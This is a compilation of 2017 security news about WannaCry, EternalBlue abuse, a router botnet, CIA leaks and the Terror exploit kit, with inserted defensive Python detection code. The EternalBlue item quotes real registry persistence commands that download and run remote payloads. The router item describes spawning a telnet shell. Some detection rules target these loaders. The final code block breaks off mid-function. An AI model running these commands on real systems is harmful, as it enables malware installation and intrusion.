The variant uses a domain in the .test Top Level Domain, which cannot be registered, as it is reserved by the IETF (Internet Engineering Task Force) for testing purposes only, Cyphort says. Because the sample has been submitted to VirusTotal from 4 different countries (Germany, Australia, Denmark and South Korea), it’s unlikely that it is a test.

“It seems that the cyber criminals found a smarter way to evade sandbox detection by checking on a site that researchers cannot sinkhole. This technique allows the malware to spread again unchallenged. It is crucial that people patch Windows machines as soon as possible to close the SMB vulnerability and stop the spread of this ransomware. In the meantime, make sure you have a good backup of your important files,” Cyphort says.
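The kill switch only ever worked because the beaconed name could be registered; a name under a TLD that RFC 2606 reserves (.test, .example, .invalid, .localhost) can never be delegated, so a variant that beacons there cannot be sinkholed. The block below is an added example, not Cyphort's or any other vendor's tool: it scans constructed DNS query-log lines for second-level labels that look like a long random beacon name and classifies whether that name could be sinkholed. The log, hostnames and entropy/length thresholds are constructed, and the real WannaCry kill-switch names are not reproduced.

```python
"""Kill-switch triage: spot beacon-like query names and ask if they can be sinkholed.

Added example, not from Cyphort or the original article. DNS_LOG, the hostnames
and the thresholds in looks_like_beacon() are constructed for the demonstration.
"""
import math
from collections import Counter
from typing import Dict, List, Tuple

RESERVED_TLDS = {"test", "example", "invalid", "localhost"}     # RFC 2606 / RFC 6761
RESERVED_DOMAINS = {"example.com", "example.net", "example.org"}  # RFC 2606

# Constructed query log: timestamp client qtype qname
DNS_LOG = """\
2017-05-20T10:00:00Z 10.0.3.4 A www.microsoft.com
2017-05-20T10:00:02Z 10.0.3.4 A xq7bz9nvkd4mprt2wyh6jcf3gls8ae5u.com
2017-05-20T10:00:03Z 10.0.3.9 A wiki.internal.test
2017-05-20T10:00:04Z 10.0.3.9 A aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.test
2017-05-20T10:00:05Z 10.0.3.9 A xq7bz9nvkd4mprt2wyh6jcf3gls8ae5u.test
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; random labels sit well above dictionary words."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())


def sinkholeable(host: str) -> Tuple[bool, str]:
    """Could a defender register this name in the public DNS?"""
    labels = host.lower().strip(".").split(".")
    if len(labels) < 2 or not all(labels):
        return False, "not a registrable name"
    if labels[-1] in RESERVED_TLDS:
        return False, f".{labels[-1]} is reserved; no registrar can delegate it"
    parent = ".".join(labels[-2:])
    if parent in RESERVED_DOMAINS:
        return False, f"{parent} is reserved by RFC 2606"
    return True, "registrable in the public DNS"


def looks_like_beacon(qname: str, min_len: int = 20, min_bits: float = 3.5) -> bool:
    """Second-level label that is long and high-entropy (assumed thresholds)."""
    labels = qname.lower().strip(".").split(".")
    if len(labels) < 2:
        return False
    sld = labels[-2]
    return len(sld) >= min_len and shannon_entropy(sld) >= min_bits


def triage_dns(log: str = DNS_LOG) -> List[Dict[str, object]]:
    hits: List[Dict[str, object]] = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, _qtype, qname = line.split()
        if looks_like_beacon(qname):
            ok, why = sinkholeable(qname)
            hits.append({"ts": ts, "client": client, "qname": qname,
                         "sinkholeable": ok, "reason": why})
    return hits


if __name__ == "__main__":
    for hit in triage_dns():
        print(hit)
```

In the constructed log the same random label appears under .com and under .test; only the first can be taken over by a researcher, which is exactly the gap the Cyphort variant exploits. The low-entropy .test name is not flagged at all, which is why the length check alone would be too noisy.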

In the meantime, security researchers are working on tools that can help WannaCry victims recover their files without paying the ransom. One of them is Wannakey, designed to extract key material from infected Windows XP PCs. However, it requires a second tool to decrypt files.

Building on Wannakey and already tested by Europol, a tool called wanakiwi appears more suited for the file decryption/restoration operation. One thing that both tools require, however, is that the WannaCry-infected computers haven’t been rebooted after the encryption took place. Already confirmed to work on Windows XP, 7, and Server 2003 (x86), wanakiwi might also work on Vista and Server 2008 and 2008 R2.


VMware Patches Workstation Vulnerabilities

23.5.2017 securityweek Vulnerability
VMware informed customers last week that updates released for the Linux and Windows versions of Workstation patch privilege escalation and denial-of-service (DoS) vulnerabilities.

One of the flaws, discovered by Jann Horn of Google Project Zero and tracked as CVE-2017-4915, affects VMware Workstation Pro and Player 12.x on Linux. The weakness has been classified as “important” severity.

The security hole, described as an insecure library loading vulnerability, allows an unprivileged host user to escalate their privileges to root on the host via ALSA sound driver configuration files.

The second vulnerability, identified by Borja Merino and tracked as CVE-2017-4916, affects VMware Workstation Pro and Player 12.x on Windows.

This “moderate” severity flaw is a NULL pointer dereference issue that exists in the vstor2 driver. An attacker with regular host user privileges can exploit the vulnerability to cause a DoS condition on the host machine.

The vulnerabilities have been patched with the release of VMware Workstation 12.5.6. There are no workarounds for either of the flaws.

VMware has released eight other security advisories this year, including for an Apache Struts 2 vulnerability that had been exploited in the wild, and security bugs disclosed by white hat hackers at this year’s Pwn2Own competition.

Exploits involving VMware virtual machine escapes earned participants more than $200,000 at Pwn2Own 2017. Researchers at Qihoo 360 received $105,000 for an Edge exploit that achieved a VM escape, while Tencent Security’s Team Sniper earned $100,000 for a Workstation exploit.


He didn't want to be a hero. This young man saved the world from a ransomware virus

22.5.2017 Novinky/Bezpečnost Viruses
The rampage of the WannaCry ransomware, which infected some 300,000 devices in more than 150 countries in just a few hours, was stopped by a security expert who is only 22 years old, Marcus Hutchins. News of his fight against the cyber pirates travelled around the world, and within a few days he became a celebrity. He himself told the British daily The Daily Mail that he never wanted any ovations and finds them more of a nuisance.
Security expert Marcus Hutchins
PHOTO: Frank Augstein, ČTK/AP
Marcus has been working for the MalwareTech.com site for several years. The site regularly monitors what is happening on the internet and tries to work out how new threats function so that he and his colleagues can then take them out of operation entirely.

That is exactly what this young man was doing the week before last, when he managed to stop the WannaCry virus in its tracks. At the time, however, nobody knew his name; the young man tried to work anonymously. As he says himself, he never wanted any fame.

Five minutes of fame
Given his heroic deed, which is at least how foreign media describe his work, he could not hide from the world. “I wasn't trying to become famous; on the contrary, I wanted to work anonymously,” the security expert told the Guardian.

“I'm just an accidental hero. I know it's only five minutes of fame, but it's still terrible for me,” Marcus said, not hiding his distaste for the media attention and fame. “I don't enjoy standing in the spotlight,” he added.

He also complained that on social networks he is literally under fire from all sorts of fans. “I basically lost all my privacy overnight,” the 22-year-old security expert said.

However much he plays down his credit for stopping the WannaCry malicious code, it was he who actually helped protect at least tens of thousands of other machines from infection and halted the spread of the virus.

It was actually an accident
The British security expert was one of the first to get hold of information about the uninvited guest the Friday before last. He even managed to obtain a working sample of the ransomware. “When I started examining it in a closed environment, I noticed that during its communication it tried to contact an internet domain that was not registered,” the young man explained on his blog.

Specifically, it was the site iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. Thanks to that he was able to gain more information about this dangerous threat.

After several hours of examination the young man found out that it really was connected to registering the free domain. The cybercriminals probably left this kind of safety catch in WannaCry so that, if needed, they could easily switch off the spread of the virus remotely. For example, so that security experts could not trace it back to them.

The 22-year-old security expert, however, discovered this safety catch before they could use it. And that was a fairly heroic feat, especially considering that he was taking a week off and connected to his computer more out of curiosity.

WannaCry, both the first and the improved second generation, attacks exactly like other extortion viruses, which are collectively called ransomware. First the malicious code penetrates the computer, then it locks it and encrypts all the data. The cyber pirates then demand a ransom to make the data accessible again.


Windows 7 powered 98% of the computers infected by WannaCry. Tools for decrypting data released

22.5.2017 CNEWS.cz Viruses
The first findings show that leaky XP machines no longer interest attackers. Tools for decrypting data have already been created, but they are significantly limited.

The recent global attack of the WannaCry ransomware underlined the need to discuss certain questions. Who bears responsibility for it? Some place the blame on Microsoft, which in turn sees the problem in unpatched computers. It even released a patch for Windows XP, although probably nobody expected that to ever happen again. The first “bonus” patch came shortly after the operating system's end of life in 2014.

Fixing the hole WannaCry exploited is the second patch Microsoft had no obligation to produce. While some are justifiably worried mainly about computers running XP, which is no longer supported and whose usage share according to Net Applications.com is still roughly 7%, the Russian antivirus specialist Kaspersky Lab uncovered something interesting.

In fact, according to the company's research, WannaCry in the overwhelming majority of cases infected computers running Windows 7. Specifically, the ransomware landed on these machines in 98.35% of all cases. The number of infected Windows XP computers, by contrast, is negligible. That is no surprise, since Windows 7 powers most conventional PCs (48.5% in April according to Net Applications.com). Moreover, XP has almost disappeared in the West; it holds a relatively high share mainly because of China.

The fact that the WannaCry ransomware did not target XP computers confirms that, from the attackers' point of view, it is now a relatively insignificant platform. There are already plenty of Windows 10 machines, but that system in turn cannot be attacked in the same way.

Tools for decrypting data encrypted by the WannaCry ransomware

Today you may (possibly) be able to save your files encrypted by the WannaCry ransomware thanks to a tool whose functionality has been tested on Windows XP, 7 (32-bit), 2003, Vista and Windows Server 2008. It remains true that backups and restoring data from a backup are your best hope of success and your best defence. The WannaKey tool in question operates under significant limitations.

Above all, the computer must not have been restarted after infection, and the part of memory holding the prime numbers used during encryption must not have been overwritten. Based on the work of the researcher who produced this file-decryption tool, a second tool was created. WanaKiwi works the same way and is bound by the same limits, but according to The Hacker News it is easier to use.


WikiLeaks continues to expose CIA tools. The Athena spyware attacks Windows XP through 10

22.5.2017 CNEWS.cz BigBrother
Hacking computers for the benefit of the state. Or not?

The topic of recent days was the massive ransomware attack the world knows as WannaCry. Apparently there was not enough news about infected computers, because a few days ago the WikiLeaks organization published information about the Athena project. It is malware developed by the American CIA in cooperation with the firm Siege Technologies.

From its nature we can say that this malicious code behaves as spyware. It reports back from the infected computer and allows its creator to run further malicious code on the machine as needed. Last but not least, Athena makes it possible to receive and, above all, send files from the infected computer. This spyware is designed for use on Windows from XP through 10.

This is already the umpteenth consecutive revelation of CIA malicious software. It started with the extensive exposure of the project code-named Vault 7, which can be characterised as a collection of hacking tools for various platforms. The exposure took place on 7 March 2017. Since then the WikiLeaks organization has published information about these related projects:

Dark Matter (23 March 2017)
Marble Framework (31 March 2017)
Grasshopper (7 April 2017)
Hive (14 April 2017)
Weeping Angel (21 April 2017)
Scribbles (28 April 2017)
Archimedes (5 May 2017)
AfterMidnight (12 May 2017)
Athena (19 May 2017)


Chasing a botnet: from honeypot to router analysis
22.5.2017 Root.cz BotNet

It all started when we received a reply to one of the e-mails that are automatically generated by our honeypots whenever an attack attempt is detected. These notifications are sent to the network's abuse contacts.

Such a reaction to a message from our honeypot naturally caught my attention. So I asked the ISP concerned for help, and before long I had two borrowed samples of the Billion BiPAC 9800VNXL router on my desk: one that had been detected directly by our honeypots and a second, clean one for comparison in case it turned out to be a persistent infection.

After the first “feel” came a bit of a disappointment. The device did not have a classic shell, only some sort of command line over telnet that was completely useless for further analysis.

When I was slowly starting to give up and resigning myself to not being able to compare the firmware samples from the two devices, I tried one last option. I connected the device to the internet on a public IP address. And it paid off. Within roughly two hours the router was fully compromised and had become part of a botnet. So I immediately disconnected it from the network and set about analysing the captured data.

It turned out that the router suffers from a vulnerability that allows a remote unauthenticated attacker to run arbitrary code. The attack consists of two HTTP/SOAP requests, the second of which concealed the string:

So the binary was downloaded and executed, and the infected router joined the botnet. Out of curiosity I uploaded the binary to VirusTotal, but as expected, architectures such as MIPS are not very interesting to antivirus companies: only one antivirus out of 55 flagged the sample as suspicious. Based on the collected data I wrote a short script that let me send commands to the router. In the end these boiled down to stopping the telnet daemon and starting it again, this time with the parameter -l /bin/sh, which made me very happy because I finally had access to a classic shell.

After that I easily extracted the firmware from both routers and verified the cryptographic hashes of the individual partitions. The partitions with the root directory and the Linux kernel were identical to the byte. Only the bootloader partition and the partition with the stored configuration differed. The difference in configuration was uninteresting, and in the bootloader, as expected, only the stored MAC address differed. So the partition comparison turned out as expected; it is not common for malware to overwrite the firmware. Partly also because the root partition uses squashfs as its file system, and modifying it requires rewriting the whole partition.

After comparing the firmware I went back to the attack that had taken place and the vulnerability found. The malware itself behaved quite decently. It adjusted iptables to protect itself from a possible subsequent infection by blocking the ports of the vulnerable service. And right after that it started scanning random IP addresses to spread further. The only thing missing was the telnet message about “securing the device”, and one could guess it was most likely the Hajime botnet. Out of curiosity I ran a few more tests, and the shortest time to infection of a clean device did not exceed 10 minutes.

The vulnerability itself therefore allows remote code execution with a maximum string length of 62 bytes. Specifically, it concerns the “NewNTPServer” “property” of the TR-064 protocol, which is intended for configuration over the local network but, apparently as a result of a faulty implementation, is also reachable from the Internet within the TR-069 protocol. The vulnerability was discovered on port 7547, but in our case it also affects port 5555, which is served by the same program (/userfs/bin/tr69). The first information about this vulnerability in another router appeared on 7 November last year and concerned Eir's D1000. Exploiting this vulnerability is very easy, and the page linked there also contains a Metasploit module.

The router manufacturer's website made no mention of any other firmware versions being available, so I contacted them with a description of the vulnerability found and asked whether they would be preparing a fix. When contacting the router manufacturer about the vulnerability, however, it emerged that a new firmware version already exists and is forwarded directly to the target customers (apparently ISPs). Users themselves unfortunately have no way of learning about the existence of a new firmware version or about the existence and severity of the vulnerability in the product they use.

That is why we are currently considering creating a website where people could have their device automatically tested for this vulnerability. One minor obstacle, however, will be the need to ask the user to power the device off and on, because if the router had already been attacked in a similar way, the vulnerability would not show up due to the port being blocked in iptables.

A search for related CVE IDs found none. After communication with MITRE, a new CVE-2016-10372 was assigned for the vulnerability previously discovered in the Eir modem, and after further investigation either a new CVE ID will be assigned for the BiPAC 9800VNXL or, if it turns out to be the same software with the same bug, it will be added to the list of vulnerable devices under CVE-2016-10372.

Even though this is not a completely new bug, nor a very widespread device, I am glad we managed to go through the whole chain of events, from detecting the security incident with our own means, through analysing the whole event, to communicating with the interested parties.

In closing I would like to thank, for their cooperation, Radek Jirout of Dial Telecom for reporting the device, and Tomáš Hruška and Marek Buchta of Joyce for lending the devices.


WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.


At least 3 different groups have been leveraging the NSA EternalBlue exploit, what went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In recent days, security experts have discovered numerous attacks leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers other threats have used it too, such as the Adylkuzz botnet, which has been active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”
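The two analyst steps the quote describes, stripping the repeating-key XOR and then locating the embedded binary, as an added example (not Cyphort's code). Only the key A9 CA 63 BA comes from the analysis; the shellcode bytes and the minimal PE-shaped blob are constructed here.

```python
import struct
from itertools import cycle
from typing import List, Optional

XOR_KEY = bytes.fromhex("A9CA63BA")  # the key quoted in Cyphort's analysis


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def find_embedded_pe(blob: bytes) -> List[int]:
    """Offsets of every plausible PE image in blob: 'MZ', an e_lfanew
    (DWORD at +0x3C) that stays inside the blob, and 'PE\\0\\0' at that spot."""
    hits: List[int] = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if pe + 4 <= len(blob) and blob[pe:pe + 4] == b"PE\0\0":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def carve_pe(blob: bytes, offset: int) -> bytes:
    """Slice out the image at offset, sizing it from the section table
    (end = max over sections of PointerToRawData + SizeOfRawData)."""
    e_lfanew = struct.unpack_from("<I", blob, offset + 0x3C)[0]
    coff = offset + e_lfanew + 4                      # COFF header follows 'PE\0\0'
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    sections = coff + 20 + opt_size                   # section table start
    end = sections + num_sections * 40
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", blob, sections + i * 40 + 16)
        end = max(end, offset + raw_ptr + raw_size)
    return blob[offset:end]


def extract_payload(encrypted: bytes, key: bytes = XOR_KEY) -> Optional[bytes]:
    """Decrypt, then carve the first embedded PE (None if none is found)."""
    plain = xor_decrypt(encrypted, key)
    hits = find_embedded_pe(plain)
    return carve_pe(plain, hits[0]) if hits else None


def build_constructed_pe() -> bytes:
    """Constructed, minimal PE-shaped blob (not a real DLL): DOS header with
    e_lfanew=0x40, COFF header with no optional header, one 16-byte section."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x2102)
    section = b".text\0\0\0" + struct.pack("<IIII", 16, 0x1000, 16, 0x80) + b"\0" * 16
    return dos + coff + section + b"\xCC" * 16       # headers are exactly 0x80 bytes


def build_constructed_shellcode() -> bytes:
    """Constructed stand-in for the captured shellcode: filler, PE, filler."""
    return b"\x90" * 37 + build_constructed_pe() + b"\0" * 5


# What the wire would carry under this scheme: the constructed shellcode
# XOR'd with the key (a constructed sample, not captured traffic).
ENCRYPTED_SAMPLE = xor_decrypt(build_constructed_shellcode(), XOR_KEY)
```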

Once it has infected a system, the malicious code closes port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
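A check a responder could run over collected Run-key values to flag the two persistence patterns above (regsvr32 fetching a scriptlet over HTTP with scrobj.dll, and msiexec installing a package from a URL). Added example, not from Cyphort's report; the two malicious values are those quoted above, the benign entries are constructed, and gathering the entries from a live registry is left as an assumption.

```python
import re
from typing import Dict, List, Tuple

# (value name, value data) pairs. The first two are the values quoted in the
# report above; the rest are constructed benign entries for contrast.
RUN_ENTRIES: List[Tuple[str, str]] = [
    ("start", r"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll"),
    ("start1", r"msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q"),
    ("OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Installer", r"msiexec.exe /i C:\ProgramData\setup.msi /q"),
]

# Each rule names the technique and matches its command-line shape.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("regsvr32 scriptlet from URL",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:\s*https?://", re.I)),
    ("regsvr32 loading scrobj.dll",
     re.compile(r"\bregsvr32(\.exe)?\b.*\bscrobj\.dll\b", re.I)),
    ("msiexec package from URL",
     re.compile(r"\bmsiexec(\.exe)?\b.*\s/i\s+https?://", re.I)),
]


def classify(command: str) -> List[str]:
    """Names of every rule the autorun command line trips (empty if none)."""
    return [name for name, rx in RULES if rx.search(command)]


def suspicious_run_entries(entries: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Filter Run-key entries down to those matching a remote-loader pattern."""
    findings = []
    for name, data in entries:
        reasons = classify(data)
        if reasons:
            findings.append({"name": name, "data": data, "reasons": reasons})
    return findings
```

A local msiexec install (the constructed "Installer" entry) is deliberately not flagged; only the URL-sourced forms are.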
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including screen monitoring, capturing audio and video, monitoring keystrokes, transferring data, deleting files, terminating processes, downloading and executing files, and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The fact that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing the EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat is able to run in the memory of the infected system after exploiting EternalBlue.

In late April, the experts at Secdo also discovered another attack exploiting the EternalBlue vulnerability; it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups have been leveraging the NSA exploit for weeks before WannaCry. This means that a significant portion of the security community either failed to monitor the threat or failed to share information about the attacks they had observed.

The success of the EternalBlue attacks is a failure of our current model of cyber security.


Netgear Now Collects Router 'Analytics Data' — Here’s How to Disable It
22.5.2017 CyberSpy

Is your router collecting data on your network?
Netgear last week pushed out a firmware update for its wireless router model NightHawk R7000 with a remote data collection feature that collects the router's analytics data and sends it to the company's server.
For now, the company has rolled out the firmware update only for its NightHawk R7000, but other router models will probably receive the update in the coming days.
According to Netgear, the router analytics data collected includes:
Total number of devices connected to the router
IP address
MAC addresses
Serial number
Router's running status
Types of connections
LAN/WAN status
Wi-Fi bands and channels
Technical details about the use and functioning of the router and the WiFi network.
The company said it is collecting the data for routine diagnostic to know how its products are used and how its routers behave.
"Technical data about the functioning and use of our routers and their WiFi network can help us to more quickly isolate and debug general technical issues, improve router features and functionality, and improve the performance and usability of our routers," Netgear said on its website.
How to Disable your Router Analytics Data Collection Feature
But if you are privacy conscious and don't want Netgear to collect details on you, you can disable this feature.
The company has provided an option in the router's configuration panel to turn the router analytics data collection feature off. Follow the instructions:
Launch a web browser from your PC or smartphone that is connected to the network.
Open the router login window by entering http://www.routerlogin.net.
Type the router username and password. If you haven't changed the default settings, your username is admin, and password is password.
Select Advanced → Administration → Router Update on the Home page.
Scroll down to the Router Analytics Data Collection section and select the Disable button to disable router analytics data collections.
Click the Apply button to save your settings.
That's it. You're done.
Boost And Secure Your Routers With DD-WRT

Alternatively, you can replace your device firmware with DD-WRT – a Linux-based open source firmware that is designed to enhance security and performance of wireless Internet routers.
Security-conscious users often prefer DD-WRT to the factory default firmware; it is compatible with many router models from popular manufacturers such as LinkSys, Cisco, Netgear, Asus, TP-Link, D-Link and more.
DD-WRT has a ton of features – it improves your wireless signal, as well as unlocks your router's potential to manage network traffic, static routing, VPN, repeating functions and more.
To check if your router is compatible with DD-WRT, head on to 'DD-WRT database' and search for your router model number.

If it's there and supported, then download it and follow below-mentioned general steps to install it:
Log into your router's admin page (usually at http://192.168.1.1/).
Go to the Admin section and choose "Firmware Upgrade."
Choose "Select File" and find your DD-WRT firmware.
Upload it and do not unplug or do anything to the router until it finishes updating.
Note: Changing your router's firmware with a non-compatible firmware can brick your router. So be very careful.


Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities
22.5.2017 securityaffairs Exploit

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported on the improvements to the Stegano exploit kit; today we will look at the Terror exploit kit, which now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017; in April experts observed a significant increase in hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at Malwarebytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it actually came from a different actor (Trustwave dubbed it Terror EK).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra, who is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites were used to redirect visitors to the exploit kit landing page through a server-side 302 redirect triggered by injected script.

The powerful exploit kit was previously observed carpet bombing victims with many exploits at the same time, but experts from the Talos group have now observed a significant change in its tactics. The Terror Exploit Kit has been improved with new exploits and fingerprinting abilities. These fingerprinting features allow the EK to decide which exploit to use against the target system.

The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, and the installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page; after a single day of analysis the gate switched to the Terror exploit kit.

“Terror seems to be constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.
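Both traits above are visible in proxy logs: the 302 bounce from the gate and the CVE id spelled out in cleartext in the landing-page URL. The scanner below, an added example rather than Talos tooling, normalises cve20132551 / cve2013-2551 to CVE-2013-2551 and pairs each hit with the 302 the same client received just before; the log lines and host names are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# 'cve20132551' or 'cve2013-2551' -> year and number groups
CVE_TOKEN = re.compile(r"^cve(\d{4})-?(\d{4,})$", re.I)


def cve_from_token(token: str) -> Optional[str]:
    """Normalise a cleartext token to 'CVE-YYYY-NNNN', or None."""
    m = CVE_TOKEN.match(token.strip())
    return f"CVE-{m.group(1)}-{m.group(2)}" if m else None


def cves_in_url(url: str) -> List[str]:
    """CVE ids appearing as a query-parameter name or value, in order seen."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    found: List[str] = []
    for name, values in qs.items():
        for token in [name, *values]:
            cve = cve_from_token(token)
            if cve and cve not in found:
                found.append(cve)
    return found


# Constructed proxy log: epoch, client, method, URL, status (one request per line).
CONSTRUCTED_PROXY_LOG = """\
1495101662 10.0.0.5 GET http://news.example.invalid/article.html 200
1495101663 10.0.0.5 GET http://news.example.invalid/stat.php 302
1495101664 10.0.0.5 GET http://lp.example.invalid/index.php?cve20132551=1&a=b 200
1495101670 10.0.0.7 GET http://cdn.example.invalid/lib.js 200
1495101700 10.0.0.7 GET http://other.example.invalid/?q=cve2013-2551 200
"""


def scan_proxy_log(text: str, window: int = 10) -> List[Dict[str, object]]:
    """One finding per request carrying a CVE token, with the most recent
    302 the same client received within `window` seconds (the gate)."""
    last_302: Dict[str, Tuple[int, str]] = {}
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                       # skip malformed lines
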